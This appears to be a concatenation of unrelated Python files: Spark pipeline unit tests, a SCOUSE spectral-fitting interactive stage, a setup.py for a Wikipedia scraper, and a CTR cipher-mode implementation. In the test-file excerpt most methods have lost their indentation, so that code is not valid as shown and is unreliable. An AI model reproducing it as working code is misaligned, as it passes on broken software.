    # coalesce without shuffle cannot make more partitions, only concatenate them
    # it is a shuffle flag check.
    repartitioned_data = Repartitioner(partitions, shuffle=False)(self.data)
    self.assertEqual(1, repartitioned_data.getNumPartitions())
    repartitioned_data = Repartitioner(partitions, shuffle=True)(self.data)
    self.assertEqual(partitions, repartitioned_data.getNumPartitions())
    repartitioned_data = Repartitioner.maybe(partitions, shuffle=True, multiplier=2)(self.data)
    self.assertEqual(partitions * 2, repartitioned_data.getNumPartitions())
    repartitioned_data = Repartitioner.maybe(None, shuffle=False)(self.data)
    self.assertEqual(1, repartitioned_data.getNumPartitions())
    repartitioned_data = Repartitioner.maybe(partitions, keymap=lambda x: x[0])(self.data)
    self.assertEqual(repartitioned_data.count(), 6)
def test_partition_selector(self):
partitioned_data = PartitionSelector(partition_index=0)(self.data)
self.assertEqual(partitioned_data.count(), 6)
def test_sampler(self):
sampled_data = Sampler()(self.data)
self.assertEqual(sampled_data.count(), 2)
def test_parquet_loader(self):
# load parquet and check number of rows
loader = ParquetLoader(session=self.spark, paths=(PARQUET_DIR, PARQUET_DIR))
data = loader.execute()
self.assertEqual(data.count(), 6 * 2)
loader = ParquetLoader(session=self.spark, paths=PARQUET_DIR)
data = loader.execute()
self.assertEqual(data.count(), 6)
self.assertEqual(loader.paths, PARQUET_DIR)
self.assertNotIn("session", loader.__getstate__())
with self.assertRaises(ValueError):
loader = ParquetLoader(session=self.spark, paths=None)
data = loader.execute()
def test_rower(self):
rows = [("get_user", 3)]
df = self.spark.createDataFrame(rows, ["identifier", "frequency"])
data = Rower(lambda x: {"identifier": x[0], "frequency": x[1]})(df.rdd)
self.assertEqual(data.count(), 1)
self.assertEqual(data.collect()[0].identifier, "get_user")
self.assertEqual(data.collect()[0].frequency, 3)
def test_dzhigurda(self):
self.assertEqual(DzhigurdaFiles(0)(self.engine.repositories).count(), 325)
self.assertEqual(DzhigurdaFiles(10)(self.engine.repositories).count(), 3490)
self.assertEqual(DzhigurdaFiles(-1)(self.engine.repositories).count(), 27745)
def test_identity(self):
# load parquet
loader = ParquetLoader(session=self.spark, paths=PARQUET_DIR)
data = loader.execute()
# check that identity returns the same RDD
data_identity = Identity()(data)
self.assertEqual(data_identity.count(), 6)
self.assertEqual(data_identity, data)
def test_distinct(self):
rows = [("foo_bar", 3), ("baz", 5), ("foo_bar", 3)]
df = self.spark.createDataFrame(rows, ["identifier", "frequency"])
self.assertEqual(set(rows), set(Distinct()(df).collect()))
def test_cacher(self):
persistence = SparkDefault.STORAGE_LEVEL
cacher = Cacher(persistence)
cached_data = cacher(self.data)
self.assertTrue(cached_data.is_cached)
self.assertEqual(cacher.persistence, getattr(StorageLevel, persistence))
self.assertIn("head", cacher.__getstate__())
cacher = Cacher.maybe(persistence=None)
uncached_data = cacher(self.data)
self.assertEqual(uncached_data, self.data)
cacher = Cacher.maybe(persistence)
cached_data = cacher(self.data)
self.assertTrue(cached_data.is_cached)
cached_data = Cacher.maybe(persistence)(self.data)
self.assertFalse(cached_data.unpersist().is_cached)
def test_ignition(self):
start_point = Ignition(self.engine)
columns = start_point(self).columns
self.assertNotIn("engine", start_point.__getstate__())
self.assertEqual(columns, ["id", "urls", "is_fork", "repository_path"])
def test_repositories_filter(self):
start_point = Ignition(self.engine)
repos = start_point.link(RepositoriesFilter(".*antoniolg.*")).link(Collector()).execute()
self.assertEqual(len(repos), 1)
self.assertEqual(repos[0].id, "github.com/antoniolg/androidmvp.git")
def test_head_files(self):
df = HeadFiles()(self.engine.repositories)
df_as_dict = df.first().asDict()
keys = set(df_as_dict.keys())
self.assertIn("commit_hash", keys)
self.assertIn("path", keys)
self.assertIn("content", keys)
self.assertIn("reference_name", keys)
def test_uast_extractor(self):
df = HeadFiles()(self.engine.repositories)
df_uast = UastExtractor()(df)
self.assertIn("uast", df_uast.columns)
def test_uast_deserializer(self):
df = HeadFiles()(self.engine.repositories)
df_uast = UastExtractor()(df)
r2d = UastRow2Document()
row_uast = r2d.documentize(df_uast.first())
uasts_empty = list(UastDeserializer().deserialize_uast(df.first()))
uasts = list(UastDeserializer().deserialize_uast(row_uast))
self.assertEqual(len(uasts_empty), 0)
self.assertGreater(len(uasts), 0)
def test_csv_saver(self):
with tempfile.TemporaryDirectory() as tmpdir:
dirname = tmpdir
# load and save data
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
CsvSaver(dirname)(df.rdd)
# read saved data and check it
for root, d, files in os.walk(dirname):
for f in files:
filename = os.path.join(root, f)
if filename.endswith(".csv"):
with open(filename) as f:
reader = csv.reader(f)
next(reader)
data = [r for r in reader]
self.assertEqual(len(data), 1)
self.assertEqual(data[0][0], rows[0][0])
self.assertEqual(int(data[0][1]), rows[0][1])
def test_parquet_saver(self):
with tempfile.TemporaryDirectory() as tmpdir:
dirname = tmpdir
try:
# load and save data
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
ParquetSaver(dirname + "/", explain=True)(df.rdd)
ParquetSaver(dirname + "2/")(df.rdd)
# read saved data and check it
data = ParquetLoader(session=self.spark, paths=dirname).execute()
self.assertEqual(data.count(), 1)
finally:
shutil.rmtree(dirname)
def test_collector(self):
data = ParquetLoader(session=self.spark, paths=PARQUET_DIR).link(Collector()) \
.execute()
self.assertEqual(len(data), 6)
def test_first(self):
row = ParquetLoader(session=self.spark, paths=PARQUET_DIR).link(First()) \
.execute()
self.assertIsInstance(row, Row)
def test_field_selector(self):
rows = [("Alice", 1)]
df = self.spark.createDataFrame(rows, ["name", "age"])
# select field "name"
row = FieldsSelector(fields=["name"], explain=True)(df.rdd).first()
self.assertFalse(hasattr(row, "age"))
self.assertTrue(hasattr(row, "name"))
# select field "age"
row = FieldsSelector(fields=["age"])(df.rdd).first()
self.assertTrue(hasattr(row, "age"))
self.assertFalse(hasattr(row, "name"))
# select field "name" and "age"
row = FieldsSelector(fields=["name", "age"])(df.rdd).first()
self.assertTrue(hasattr(row, "age"))
self.assertTrue(hasattr(row, "name"))
def test_language_selector(self):
language_selector = LanguageSelector(languages=["XML", "YAML"], blacklist=True)
df = language_selector(HeadFiles()(self.engine.repositories).classify_languages())
langs = [x.lang for x in df.select("lang").distinct().collect()]
self.assertEqual(langs, ["Markdown", "Gradle", "Text", "INI",
"Batchfile", "Python", "Java", "Shell"])
language_selector = LanguageSelector(languages=["Python", "Java"], blacklist=False)
df = language_selector(HeadFiles()(self.engine.repositories).classify_languages())
langs = [x.lang for x in df.select("lang").distinct().collect()]
self.assertEqual(langs, ["Python", "Java"])
# Allow running this test module directly with the unittest runner.
if __name__ == "__main__":
    unittest.main()
|
# Licensed under an MIT open source license - see LICENSE
"""
SCOUSE - Semi-automated multi-COmponent Universal Spectral-line fitting Engine
Copyright (c) 2016-2018 Jonathan D. Henshaw
CONTACT: henshaw@mpia.de
"""
import numpy as np
import itertools
import matplotlib.pyplot as plt
import sys
from matplotlib import pyplot
from matplotlib.patches import Rectangle
from .stage_2 import *
from .stage_3 import get_flux, get_indiv_spec, fit_indiv_spectra
from .stage_5 import *
# Module-level stage-2 fitter instance; `fitting` is the bound method invoked
# by manually_fit_blocks below.  Stage2Fitter is presumably provided by the
# `.stage_2` wildcard import above — confirm.
Fitter = Stage2Fitter()
fitting = Fitter.preparefit
from .saa_description import *
from .interactiveplot import showplot
from .solution_description import fit, print_fit_information
from .indiv_spec_description import *
def event_loop():
    """Block until the current matplotlib figure is closed.

    Repeatedly redraws the current canvas and runs its event loop in short
    slices, which keeps the GUI responsive without plt.pause's figure
    raising.  A KeyboardInterrupt exits the loop early.
    """
    # `time` is not imported at the top of this module; import it locally so
    # the loop cannot fail with NameError regardless of what the wildcard
    # imports above happen to export.
    import time

    fig = plt.gcf()
    while plt.fignum_exists(fig.number):
        try:
            # using just a few little bits of plt.pause below
            plt.gcf().canvas.draw()
            plt.gcf().canvas.start_event_loop(0.1)
            time.sleep(0.1)
        except KeyboardInterrupt:
            break
def check_blocks(scouseobject):
    """
    Checks the current check_spec_indices against those in check_block_indices
    and gets rid of any duplicates

    Returns the spectra keys from check_spec_indices that are NOT already
    covered by a block in check_block_indices (those will be fit anyway).
    """
    _check_spec_indices = list(scouseobject.check_spec_indices)
    _check_block_indices = list(scouseobject.check_block_indices)
    _block_indices = []
    # Firstly get the indices associated with the blocks
    nxblocks, nyblocks, blockarr = get_blocks(scouseobject, scouseobject.blocksize)
    spec_mask = pad_spec(scouseobject, scouseobject.blocksize, nxblocks, nyblocks)
    # cycle through the blocks and check the indices against _check_spec_indices
    for blocknum in _check_block_indices:
        keep = (blockarr == blocknum)
        speckeys = spec_mask[keep]
        # padding fills the mask with NaNs; keep only real spectrum keys
        speckeys = [key for key in speckeys if np.isfinite(key)]
        block_indices = np.array(speckeys)
        # was a bare `argsort(...)`: not defined in this module, use numpy's
        sortidx = np.argsort(block_indices)
        block_indices = block_indices[sortidx]
        _block_indices += list(block_indices)
    # remove any keys from _check_spec_indices that are in _block_indices as they
    # will be fit anyway
    _check_spec_indices = [key for key in _check_spec_indices if key not in _block_indices]
    return _check_spec_indices
def get_block_indices(scouseobject, blocknum):
    """
    Returns a list of indices for the spectra contained within the blocks
    """
    # Build the block layout and the (padded, NaN-filled) key mask
    nxb, nyb, blockarr = get_blocks(scouseobject, scouseobject.blocksize)
    mask = pad_spec(scouseobject, scouseobject.blocksize, nxb, nyb)
    # Keys belonging to the requested block; NaNs mark padding cells
    selected = mask[blockarr == blocknum]
    valid_keys = [int(key) for key in selected if np.isfinite(key)]
    return np.sort(valid_keys)
def gen_2d_coords(scouseobject, block_indices):
    """
    Takes flattened indices and returns an array of the 2D indices
    """
    # The spatial grid is the cube shape without the spectral (first) axis
    spatial_shape = scouseobject.cube.shape[1:]
    return np.asarray([np.asarray(np.unravel_index(flat_idx, spatial_shape))
                       for flat_idx in block_indices])
def gen_pseudo_SAA(scouseobject, coords, block_dict, blocknum, spec):
    """
    Creates an SAA from a list of individual spectra
    """
    # Accumulate every member spectrum of the block into `spec` in place,
    # then take the mean over the number of members
    for ycrd, xcrd in coords:
        spec[:] += scouseobject.cube[:, ycrd, xcrd].value
    averaged = spec / len(coords[:, 0])
    # Wrap the averaged spectrum in a pseudo-SAA, register it in the block
    # dictionary and attach the member coordinates
    SAA = saa([blocknum, blocknum], averaged,
              idx=blocknum, sample=True, scouse=scouseobject)
    block_dict[blocknum] = SAA
    add_ids(SAA, list(coords))
    return SAA
def initialise_indiv_spectra_s6(scouseobject, SAA, njobs):
    """
    Initialise the spectra for fitting
    """
    indiv_spectra = {}
    common_args = [scouseobject, SAA]
    n_spectra = len(SAA.indices_flat)
    if njobs > 1:
        # Parallel path: one [k, scouseobject, SAA] input per spectrum
        inputs = [[k] + common_args for k in range(n_spectra)]
        # Send to parallel_map
        results = parallel_map(get_indiv_spec, inputs, numcores=njobs)
        merged_spec = np.asarray([spec for spec in results if spec is not None])
        # Add the spectra to the dict, keyed by flattened index
        for k in range(n_spectra):
            indiv_spectra[SAA.indices_flat[k]] = merged_spec[k]
    else:
        # Serial path: same inputs, computed one at a time
        for k in range(n_spectra):
            indiv_spectra[SAA.indices_flat[k]] = get_indiv_spec([k] + common_args)
    add_indiv_spectra(SAA, indiv_spectra)
def manually_fit_blocks(scouseobject, block_dict, blocknum):
    """
    Manual fitting of the individual blocks

    Launches the interactive stage-2 fitter (module-level `fitting`) on the
    pseudo-SAA stored under `blocknum` in `block_dict`.
    """
    # `warnings` is not imported at the top of this module; import locally so
    # this cannot fail with NameError regardless of the wildcard imports.
    import warnings

    SAA = block_dict[blocknum]
    with warnings.catch_warnings():
        # This is to catch an annoying matplotlib deprecation warning:
        # "Using default event loop until function specific to this GUI is implemented"
        warnings.simplefilter('ignore', category=DeprecationWarning)
        bf = fitting(scouseobject, SAA, block_dict, blocknum,
                     training_set=False,
                     init_guess=True)
def auto_fit_blocks(scouseobject, block_dict, njobs, blocksize, verbose=False):
    """
    automated fitting of the blocks

    Fits the member spectra of every checked block, then promotes each
    block-level solution to the spectrum's best-fitting model while demoting
    the previous best fit into the alternatives list.
    """
    # (removed an unused `indiv_dictionary = {}` local)
    # Fit the spectra
    fit_indiv_spectra(scouseobject, block_dict, blocksize / 3,
                      njobs=njobs, spatial=False, verbose=verbose, stage=6)
    for block_ind in scouseobject.check_block_indices:
        SAA = block_dict[block_ind]
        for key in SAA.indices_flat:
            spectrum = scouseobject.indiv_dict[key]
            bfmodel = spectrum.model
            alternatives = spectrum.models
            # Flatten [[best fit], alternatives] into a single candidate list
            models = [mod for mods in ([bfmodel], alternatives) for mod in mods]
            # Now add this as the best-fitting model and add the others to models
            add_bf_model(spectrum, SAA.indiv_spectra[key].model_parent)
            update_model_list(spectrum, models)
            add_decision(spectrum, 'block refit')
def get_offsets(radius_pix):
    """
    Returns offsets of adjacent pixels

    Notes:
    For grid size of 3 - returns
    _offsets = np.array([[-1,1], [0,1], [1,1], [-1,0], [0,0], [1,0], [-1,-1], [0,-1], [1,-1]])
    etc.
    """
    arr = np.arange(radius_pix + 1)
    # `np.int` was removed in NumPy 1.24; the builtin int is the correct alias
    sym = np.concatenate((arr * -1, arr)).astype(int)
    sym = np.unique(sym)
    _offsets = [pair for pair in itertools.product(sym, sym)]
    return _offsets
def neighbours(n_dim, idx, radius_pix):
    """
    Returns the indices of adjacent pixels
    """
    # 2D position of the selected spectrum
    centre = np.unravel_index(idx, n_dim)
    # All candidate neighbour coordinates (centre + every offset)
    candidates = np.array([tuple(c) for c in np.add(get_offsets(radius_pix), centre)])
    # Mark out-of-bounds candidates as NaN so the grid ordering is preserved
    validids = np.full(np.shape(candidates), np.nan)
    in_bounds = ((candidates[:, 0] >= 0) & (candidates[:, 0] < n_dim[0]) &
                 (candidates[:, 1] >= 0) & (candidates[:, 1] < n_dim[1]))
    validids[in_bounds] = candidates[in_bounds, :]
    # Package the valid neighbours up and send them back: valid coordinates
    # become flattened indices, invalid ones stay NaN
    indices_adjacent = []
    for row in validids:
        if np.isfinite(row[0]):
            flat = np.ravel_multi_index(np.array([int(row[0]), int(row[1])]), n_dim)
            indices_adjacent.append(flat)
        else:
            indices_adjacent.append(np.nan)
    return indices_adjacent
def plot_neighbour_pixels(scouseobject, indices_adjacent, figsize):
    """
    Plot neighbours and their model solutions

    Draws a sqrt(npix) x sqrt(npix) grid: one panel per neighbour index, each
    showing the spectrum with its best-fitting model overplotted.  Missing /
    out-of-bounds neighbours get an 'x' marker.  Blocks until the user
    presses 'enter' (see keyentry/event_loop).
    """
    npix = np.size(indices_adjacent)
    # Set up figure page — assumes npix is a perfect square (the neighbour
    # grid is (2r+1) x (2r+1))
    fig, axes = pyplot.subplots(int(np.sqrt(npix)), int(np.sqrt(npix)), figsize=figsize)
    fig.canvas.mpl_connect('key_press_event', keyentry)
    fig.patch.set_facecolor('black')
    fig.patch.set_alpha(0.05)
    plt.suptitle("Checking spectrum and its neighbours. Press 'enter' to continue.")
    # Flatten the axes grid bottom-up so panel order matches the pixel layout
    ax = [a for axis in axes[::-1] for a in axis]
    for i, key in enumerate(indices_adjacent, start=0):
        if np.isfinite(key) and key in scouseobject.indiv_dict:
            spectrum = scouseobject.indiv_dict[key]
            # Get the correct subplot axis
            axis = ax[i]
            # First plot the Spectrum
            axis.plot(scouseobject.xtrim, get_flux(scouseobject, spectrum), 'k-', drawstyle='steps', lw=1)
            # Recreate the model from information held in the solution
            # description
            bfmodel = spectrum.model
            mod, res = recreate_model(scouseobject, spectrum, bfmodel)
            # now overplot the model
            if bfmodel.ncomps == 0.0:
                axis.plot(scouseobject.xtrim, mod[:,0], 'b-', lw=1)
            else:
                for k in range(int(bfmodel.ncomps)):
                    axis.plot(scouseobject.xtrim, mod[:,k], 'b-', lw=1)
            # Tint every panel except the central (selected) spectrum
            if i != round((npix/2)-0.5):
                axis.patch.set_facecolor('blue')
                axis.patch.set_alpha(0.1)
        else:
            # Neighbour is out of bounds or has no solution: mark it with 'x'
            # Get the correct subplot axis
            axis = ax[i]
            axis.plot(0.5, 0.5, 'kx', transform=axis.transAxes, ms=10)
            axis.patch.set_facecolor('blue')
            axis.patch.set_alpha(0.1)
    pyplot.tight_layout(rect=[0, 0.03, 1, 0.95])
    pyplot.show()
    event_loop()
def keyentry(event):
    """
    What happens following a key entry
    """
    # Close the active figure on 'enter'; every other key is ignored.
    if event.key == 'enter':
        plt.close()
    return
def plot_alternatives(scouseobject, key, figsize, plot_residuals=False):
    """
    Plot the spectrum to be checked and its alternatives

    One panel per candidate model: the current best fit first, then each
    alternative.  Returns the flattened candidate list together with the
    panels the user selected in the interactive plot.
    """
    spectrum = scouseobject.indiv_dict[key]
    bfmodel = spectrum.model
    alternatives = spectrum.models
    # Candidate list: [[best fit], alternatives], flattened below
    allmodels = []
    allmodels.append([bfmodel])
    allmodels.append(alternatives)
    # Flatten
    allmodels = [mod for mods in allmodels for mod in mods]
    lenmods = np.size(allmodels)
    # Set up figure page
    fig, ax = pyplot.subplots(1, lenmods, figsize=[12,5])
    for i in range(lenmods):
        # Get the correct subplot axis
        # (pyplot.subplots returns a bare Axes, not an array, when lenmods == 1)
        if lenmods == 1:
            axis = ax
        else:
            axis = ax[i]
        bfmodel = allmodels[i]
        # First plot the Spectrum
        axis.plot(scouseobject.xtrim, get_flux(scouseobject, spectrum), 'k-', drawstyle='steps', lw=1)
        # Recreate the model from information held in the solution
        # description
        mod,res = recreate_model(scouseobject, spectrum, bfmodel)
        # now overplot the model
        if bfmodel.ncomps == 0.0:
            axis.plot(scouseobject.xtrim, mod[:,0], 'b-', lw=1)
        else:
            for k in range(int(bfmodel.ncomps)):
                axis.plot(scouseobject.xtrim, mod[:,k], 'b-', lw=1)
        if plot_residuals:
            axis.plot(scouseobject.xtrim, res,'g-', drawstyle='steps', lw=1)
    # Create the interactive plot; blocks until the figure is closed
    intplot = showplot(fig, ax, keep=True)
    fig.canvas.mpl_connect('key_press_event', keyentry)
    event_loop()
    return allmodels, intplot.subplots
def update_models(scouseobject, key, models, selection):
    """
    Here we update the model selection based on the users instructions

    Three cases depending on `selection` (panel indices chosen in the
    interactive plot):
      * empty selection  -> refit the spectrum manually with Stage6Fitter
      * non-zero index   -> adopt that alternative as the best fit
      * index 0          -> keep the current best-fitting solution
    """
    spectrum = scouseobject.indiv_dict[key]
    if np.size(selection) == 0.0:
        # If no selection is made - refit manually
        # Make pyspeckit be quiet
        # NOTE(review): `log`, `get_spec` and `colors` appear to come from the
        # wildcard imports at the top of the module — confirm.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore')
            old_log = log.level
            log.setLevel('ERROR')
            # generate a spectrum
            spec = get_spec(scouseobject, spectrum)
            log.setLevel(old_log)
        #bf = interactive_fitting(scouseobject, spectrum, spec)
        bf = Stage6Fitter()(scouseobject, spectrum, spec)
        # Now add this as the best-fitting model and add the others to models
        add_bf_model(spectrum, bf)
        update_model_list(spectrum, models)
        decision = 'refit'
        add_decision(spectrum, decision)
    elif selection[0] != 0.0:
        # If any spectrum other than the first is selected then swap this to the
        # model and the current best fit to models
        bf = models[selection[0]]
        models.remove(models[selection[0]])
        # Now add this as the best-fitting model and add the others to models
        add_bf_model(spectrum, bf)
        update_model_list(spectrum, models)
        decision = 'alternative'
        add_decision(spectrum, decision)
        print("")
        print("Selection acknowledged. "+
              colors.fg._lightgreen_+"Alternative spectrum selected"+colors._endc_+".")
        print_fit_information(bf, init_guess=False)
    else:
        # If the first spectrum was selected then the user has chosen to accept
        # the current best-fitting solution - so do nothing.
        print("")
        print("Selection acknowledged. "+
              colors.fg._lightgreen_+"Original solution retained"+colors._endc_+".")
        print_fit_information(spectrum.model, init_guess=False)
        pass
class Stage6Fitter(object):
    """Interactive (pyspeckit-based) refitter used during the stage-6 checks.

    Calling an instance runs interactive_fitting and returns the resulting
    best-fitting `fit` solution.
    """

    def __call__(self, *args):
        return self.interactive_fitting(*args)

    def interactive_fitting(self, scouseobject, spectrum, spec):
        """
        Interactive fitter for stage 6

        Loops until the user accepts a fit, either through matplotlib key
        events (interactive backends) or a terminal y/n prompt.
        """
        print("")
        print("Beginning interactive fit of spectrum {0}".format(spectrum))

        self.residuals_shown = False
        self.spec = spec
        self.spectrum = spectrum
        self.scouseobject = scouseobject
        self.happy = False
        # Counts completed non-interactive fit attempts; read by
        # interactive_callback.  Previously never initialised, which raised
        # AttributeError the first time the non-interactive path ran.
        self.firstgo = 0

        while not self.happy:
            # Interactive fitting with pyspeckit
            spec.plotter(xmin=np.min(self.scouseobject.xtrim),
                         xmax=np.max(self.scouseobject.xtrim))
            spec.plotter.figure.canvas.callbacks.disconnect(3)
            spec.specfit.clear_all_connections()
            spec.specfit(interactive=True,
                         print_message=False,
                         xmin=np.min(self.scouseobject.xtrim),
                         xmax=np.max(self.scouseobject.xtrim))
            with warnings.catch_warnings():
                # Silence matplotlib's "Using default event loop ..." warning
                warnings.simplefilter('ignore', category=DeprecationWarning)
                if plt.matplotlib.rcParams['interactive']:
                    spec.plotter.axis.figure.canvas.mpl_connect('key_press_event',
                                                                self.interactive_callback)
                    event_loop()
                else:
                    plt.show()
                    self.happy = self.interactive_callback('noninteractive')
                if not hasattr(spec.specfit, 'fitter'):
                    raise ValueError("No fitter available for the spectrum."
                                     " This can occur if you have plt.ion() set"
                                     " or if you did not fit the spectrum."
                                     )
        return self.bf

    def interactive_callback(self, event):
        """
        A 'callback function' to be triggered when the user selects a fit.
        """
        if plt.matplotlib.rcParams['interactive']:
            if hasattr(event, 'key'):
                # Fixed: `event.key in ('enter')` was a substring test against
                # the string 'enter', so single keys 'e','n','t','r' matched too.
                if event.key == 'enter':
                    if self.residuals_shown:
                        print("")
                        print("'enter' key acknowledged."+
                              colors.fg._lightgreen_+" Solution accepted"+colors._endc_+".")
                        print("")
                        self.guesses = self.spec.specfit.parinfo.values
                        self.happy = True
                        plt.close(self.spec.plotter.figure.number)
                        return True
                elif event.key == 'esc':
                    self.happy = False
                    self.spec.specfit.clear_all_connections()
                    assert self.spec.plotter._active_gui is None
                elif event.key in ('f', 'F'):
                    print("")
                    print("'f' key acknowledged."+
                          colors.fg._lightred_+" Re-entering interactive fitter"+colors._endc_+".")
                    self.residuals_shown = False
                elif event.key in ('d', 'D', '3', 3):
                    # The fit has been performed interactively, but we also
                    # want to print out the nicely-formatted additional
                    # information
                    self.spec.specfit.button3action(event)
                    self.bf = fit(self.spec, idx=self.spectrum.index,
                                  scouse=self.scouseobject)
                    self.spec.specfit.plot_fit(show_components=True)
                    self.spec.specfit.plotresiduals(axis=self.spec.plotter.axis,
                                                    clear=False,
                                                    color='g',
                                                    label=False)
                    self.residuals_shown = True
                    print_fit_information(self.bf, init_guess=True)
                    print("Options:"
                          "\n"
                          "1) If you are happy with this fit, press Enter."
                          "\n"
                          "2) If not, press 'f' to re-enter the interactive fitter.")
                    self.happy = None
                else:
                    self.happy = None
            elif hasattr(event, 'button') and event.button in ('d', 'D', '3', 3):
                # The fit has been performed interactively, but we also
                # want to print out the nicely-formatted additional
                # information
                self.bf = fit(self.spec, idx=self.spectrum.index,
                              scouse=self.scouseobject)
                print_fit_information(self.bf, init_guess=True)
                print("Options:"
                      "\n"
                      "1) If you are happy with this fit, press Enter."
                      "\n"
                      "2) If not, press 'f' to re-enter the interactive fitter.")
                self.happy = None
            else:
                self.happy = None
        else:
            # this should only happen if not triggered by a callback
            assert event == 'noninteractive'
            # Best-fitting model solution
            self.bf = fit(self.spec, idx=self.spectrum.index,
                          scouse=self.scouseobject)
            if self.firstgo == 0:
                print("")
                print_fit_information(self.bf, init_guess=True)
                print("")
            else:
                print("")
                print_fit_information(self.bf, init_guess=False)
                print("")
            h = input("Are you happy with the fit? (y/n): ")
            self.happy = h in ['True', 'T', 'true', '1', 't', 'y', 'yes', 'Y', 'Yes']
            print("")
            self.firstgo += 1
        return self.happy
|
import os

from setuptools import setup, find_packages

here = os.path.abspath(os.path.dirname(__file__))

# Read the long-description parts, closing the file handles promptly
# (the originals left the file objects open).
with open(os.path.join(here, 'README.md')) as readme_file:
    README = readme_file.read()
with open(os.path.join(here, 'CHANGES.md')) as changes_file:
    CHANGES = changes_file.read()

# Pinned runtime, test and lint dependencies.
requires = [
    'paste',
    'pyramid>=1.0.2',
    'pyramid_jinja2==2.5',
    'pyramid_debugtoolbar==2.4.1',
    'wtforms==2.0.2',
    'waitress==0.8.10',
    'requests==2.7.0',
    'beautifulsoup4==4.4.0',
    # test packages
    'nose==1.3.7',
    'coverage==3.7.1',
    'webtest==2.0.18',
    # nice to have
    'pep8',
    'pyflakes',
]

setup(
    name='Scrape Wikipedia',
    version='0.1a',
    packages=find_packages(),
    include_package_data=True,
    zip_safe=False,
    test_suite='scrape_wikipedia',
    install_requires=requires,
    entry_points="""\
[paste.app_factory]
main = scrape_wikipedia:main
""",
    paster_plugins=['pyramid'],
    author='Olwethu Ntiyonke',
    author_email='olwethu.a@gmail.com',
    description='Scrape Wikipedia content table',
    keywords='pyramid scrape jinja2 wikipedia wtforms',
    long_description=README + '\n\n' + CHANGES,
    classifiers=[
        # "Development Status :: 0.1a - Alpha" and "Topic :: Web scrape" are
        # not valid trove classifiers and are rejected by modern tooling.
        "Development Status :: 3 - Alpha",
        "Programming Language :: Python",
        "Framework :: Pylons",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
    ],
)
|
"""
ctr
~~~
This module provides an implementation for the Counter (CTR)
block cipher mode of operation.
Author: Kinshuk Vasisht
Dated : 12/03/2022
"""
import typing
import secrets
from .core import ModeOfOperation
from .padding import PaddingMode
from .utils import xor
class CounterMode(ModeOfOperation):
    """
    Implementation of the Counter mode of operation.

    This mode of operation divides the plaintext into segments of a fixed block size each, after adding any
    padding as required, then the segments are encrypted individually, where each plaintext is XOR-ed with
    the encrypted version of IV_i, where the ith IV is defined as IV + i - 1. For the first block, IV_0 = IV.

    Encryption:
    => C_i = P_i ^ E(IV + i - 1, K), where
        C_i = ciphertext block i,
        P_i = plaintext block i
        K   = key used with the cipher
        IV  = Initialization Vector

    Decryption:
    => P_i = C_i ^ E(IV + i - 1, K), as a result the decryption process
       also uses the encryption operation of the cipher.
    """
    def __init__(self, cipher, IV = None, padding_mode = PaddingMode.PAD_PKCS7, block_size = None):
        """ Creates a new CTR mode of operation instance.

        Args:
            cipher (BlockCipher): A block cipher providing an encrypt and decrypt method.
            IV (str | bytes | None, optional): Initialization vector to use in the operation.
                Defaults to None, for which a random IV is generated.
            padding_mode (PaddingStrategy, optional): Padding Strategy to use.
                Defaults to PaddingMode.PAD_PKCS7.
            block_size (int | None, optional): Block size used by the cipher. Defaults to None, where it is
                inferred from the cipher instance.
        """
        super().__init__(cipher, padding_mode, block_size)
        # block_size is in bits, so the IV is block_size/8 random bytes.
        self.IV = IV or secrets.token_bytes(self.block_size >> 3)

    def encrypt(self, plaintext: "typing.Iterable[str | bytes]", debug = False):
        """ Encrypts multiple blocks of data using the CTR mode of operation.

        Args:
            plaintext (typing.Iterable[str | bytes]): Iterable yielding blocks of plaintext to encrypt.
            debug (bool, optional): If true, outputs extra data to view the steps of the procedure.

        Yields:
            str | bytes: The ciphertext blocks.
        """
        # Pad the data to make the length an integral multiple of the block size.
        plaintext = self.padding_mode.pad(plaintext, debug)
        # Encrypt blocks following the CTR procedure:
        last_IV = self.IV
        for block_data in plaintext:
            if debug: plaintext_block = block_data['padded']
            else     : plaintext_block = block_data
            # IV'_i = E(IV_i, K) = E(IV + i - 1, K)
            encrypted_IV = self.cipher.encrypt(last_IV)
            # C_i = P_i ^ IV'_i = P_i ^ E(IV + i - 1, K)
            ciphertext_block = xor(plaintext_block, encrypted_IV)
            if debug:
                block_data['encrypted'] = ciphertext_block
                block_data['IV'] = last_IV
                block_data['E_IV'] = encrypted_IV
                yield block_data
            else: yield ciphertext_block
            IV_bits = int.from_bytes(last_IV, byteorder='big')
            # IV_(i+1) = IV_i + 1 = IV + i  (wraps around modulo 2**block_size)
            last_IV = ((IV_bits + 1) & ((1 << self.block_size) - 1))
            last_IV = last_IV.to_bytes(self.block_size >> 3, byteorder='big')

    def decrypt(self, ciphertext: "typing.Iterable[str | bytes]", debug = False):
        """ Decrypts blocks encrypted using the CTR mode of operation.

        Args:
            ciphertext (typing.Iterable[str | bytes]): Iterable yielding blocks of ciphertext to decrypt.
            debug (bool, optional): If true, outputs extra data to view the steps of the procedure.

        Yields:
            str | bytes: The plaintext blocks.
        """
        # Decrypt blocks following the CTR procedure (decryption re-uses the
        # cipher's *encrypt* operation on the counter values):
        def plaintext_generator():
            last_IV = self.IV
            for ciphertext_block in ciphertext:
                # IV'_i = E(IV_i, K) = E(IV + i - 1, K)
                encrypted_IV = self.cipher.encrypt(last_IV)
                # P_i = C_i ^ IV'_i = C_i ^ E(IV + i - 1, K)
                plaintext_block = xor(ciphertext_block, encrypted_IV)
                if debug:
                    yield {
                        'encrypted': ciphertext_block,
                        'decrypted': plaintext_block,
                        'IV'       : last_IV,
                        'E_IV'     : encrypted_IV
                    }
                else: yield plaintext_block
                IV_bits = int.from_bytes(last_IV, byteorder='big')
                # IV_(i+1) = IV_i + 1 = IV + i  (wraps around modulo 2**block_size)
                last_IV = ((IV_bits + 1) & ((1 << self.block_size) - 1))
                last_IV = last_IV.to_bytes(self.block_size >> 3, byteorder='big')
        # Unpad the data to restore the original contents
        return self.padding_mode.unpad(plaintext_generator(), debug)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.